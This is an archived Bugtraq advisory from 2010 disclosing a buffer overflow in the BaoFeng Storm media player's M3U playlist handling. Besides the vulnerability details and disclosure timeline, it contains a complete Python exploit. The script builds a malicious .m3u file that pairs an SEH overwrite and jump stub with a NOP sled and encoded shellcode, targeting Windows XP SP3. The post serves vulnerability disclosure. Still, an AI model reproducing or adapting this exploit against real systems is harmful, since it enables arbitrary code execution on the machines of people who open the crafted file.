lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-id: <201005061127485725436@neusoft.com>
Date: Thu, 06 May 2010 11:27:50 +0800
From: lilf <lilf@...soft.com>
To: bugtraq <bugtraq@...urityfocus.com>
Subject: BaoFeng Storm M3U File Processing Buffer Overflow Vulnerability

BaoFeng Storm M3U File Processing Buffer Overflow Vulnerability

Vulnerable: Storm2012 3.10.4.21  
	    Storm2012 3.10.4.16
	    Storm2012 3.10.4.8
	    Storm2012 3.10.3.17
	    Storm2012 3.10.2.5
	    Storm2012 3.10.1.12
            Other versions also may be affected

Vendor:	www.baofeng.com

1) Software Description:
BaoFeng Storm is very popular universal multimedia player in china.

2) Details:
A  buffer overflow vulnerability in BaoFeng Storm that Processing m3u file. allows remote attackers to execute arbitrary code via a long string in an M3U file. 

3) Credit:
The vulnerability was discovered by Qingshan Li and Lufeng Li of Neusoft Corporation

4) Timeline:
2010.04.26   Report to CNVD
2010.04.29   Vendor upgrade
2010.05.06   Public

5) Exploit:
#!/usr/bin/env python

#################################################################
#
# Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit
# CNVD-ID: CNVD-2010-00752
# Found By: Qingshan Li and Lufeng Li of Neusoft Corporation
# Download: www.baofeng.com
# Test: Put m3u file in root(e.g. c:/ d:/),and open this m3u file
# Platform: Windows XPSP3 Chinese Simplified
#
#################################################################
file= "baofeng.m3u"
junk ="\x41"*795
nseh="\x61\xe8\xe1"
seh="\xaa\xd7\x40"

jmp ="\x53\x53\x6d\x58\x6d\x05\x11\x22\x6d\x2d\x10\x22\x6d\xac\xe4"
nops ="\x42" * 110
shellcode=("PPYAIAIAIAIAQATAXAZAPA3QADAZA"
"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA"
"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB"
"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K"
"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL"
"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55"
"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V"
"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB"
"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT"
"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU"
"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM"
"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"
"QQ2LRCM0LJA")

fobj=open(file,"w")
payload=junk+nseh+seh+jmp+nops+shellcode
fobj.write(payload)
fobj.close()

--------------
Qingshan Li and Lufeng Li
2010-05-06

---------------------------------------------------------------------------------------------------
Confidentiality Notice: The information contained in this e-mail and any accompanying attachment(s) 
is intended only for the use of the intended recipient and may be confidential and/or privileged of 
Neusoft Corporation, its subsidiaries and/or its affiliates. If any reader of this communication is 
not the intended recipient, unauthorized use, forwarding, printing,  storing, disclosure or copying 
is strictly prohibited, and may be unlawful.If you have received this communication in error,please 
immediately notify the sender by return e-mail, and delete the original message and all copies from 
your system. Thank you. 
---------------------------------------------------------------------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ